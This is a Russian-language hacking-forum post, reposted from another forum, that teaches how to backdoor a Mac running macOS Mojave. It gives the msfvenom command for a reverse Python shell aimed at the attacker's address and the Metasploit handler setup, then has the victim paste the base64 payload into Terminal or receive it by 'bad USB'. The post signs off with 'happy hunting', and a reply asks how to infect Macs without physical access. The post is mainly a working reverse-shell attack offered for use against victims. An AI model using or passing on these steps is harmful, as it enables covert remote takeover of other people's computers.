• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Создание бэкдора в MacOS X при помощи терминала и Kali Linux

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Создание бэкдора в операционной системе Mac OS X при помощи терминала и Kali Linux

Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники используют ее для устойчивости вирусов, путем перемещения вируса в папку с системными файлами и дальнейшим его переименованием в файл обновления, например explorer.exe. Но сейчас я покажу как можно создать бэкдор в яблочной системе при помощи команды в терминале.

Для создания бэкдора понадобится всеми любимый Metasploit, установленный на Kali Linux. В качестве жертвы выступит macOS Mojave версии 10.14.4 на моем макбуке. А в качестве атакующей машины - Kali Linux на virtual box. Заражение компьютера будет происходить через комманд шелл, написанный на питоне. В результате удачной атаки откроется доступ к файловой системе жертвы, возможность загружать сторонние эксплоиты на компьютер или скачивать файлы с зараженной машины.

Перейдем к практике.

1) Запустим метасплоит всем известной командой
Код:
msfconsole
(примечание: если у кого то она не работает, запустите программу через графическое меню слева)

e9f1RgC.png


2)
Код:
use exploit/multi/handler

GFpYN2s.png


3) Создаем сам exploit, указывая свой IPv4 вместо YOUR IP
Код:
msfvenom -p cmd/unix/reverse_python LHOST=YOUR IP LPORT=9090 -f rar > /root/shell.py

MSO8Md5.png


4) Для удобства запустим сервер apache
Код:
 service apache2 start

2Xc6meC.png


5) Переместим туда shell.py
Код:
cp shell.py /var/www/html

sWHXdS9.png


6) Настраиваем метасплоит под наш вирус и запускаем. Главное не сделать опечатку, а то все пойдет через АНБ.
Код:
set payload cmd/unix/reverse_python
set LHOST YOUR IPv4
set LPORT 9090
run

cgxlfU7.png


7) Если у вас есть доступ к компьютеру жертвы, то откройте safari и перейдите по ссылке lhost, если же нет, то можно использовать bad usb

2VqG8CV.png


8) Открываем файл shell.py

zkzMAIf.png


9) Видим непонятные цифры и буквы в формате base64, копируем, вставляем в терминал и запускаем.

X9xA2Yp.png


10) И видим что у появилась одна сессия.

(примечание: после запуска сессии никаких дополнительных команд вводить не нужно, вы уже внутри.)

7tpAT9O.png


11) Ну а что вы будете делать дальше зависит только от вашего воображения.

чтобы узнать в какой вы директории, напишите pwd
чтобы узнать какие файлы в директории, напишите ls

ifIkGcY.png


Спасибо за внимание и удачной охоты.

автор: Default
взято с codeby
 
На практике хакерство заканчивается на пункте 7 "Если у вас есть доступ к компьютеру жертвы" :)
У кого-нибудь есть опыт установки полезной нагрузки на MacOS без "доступа к компьютеру жертвы" ?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх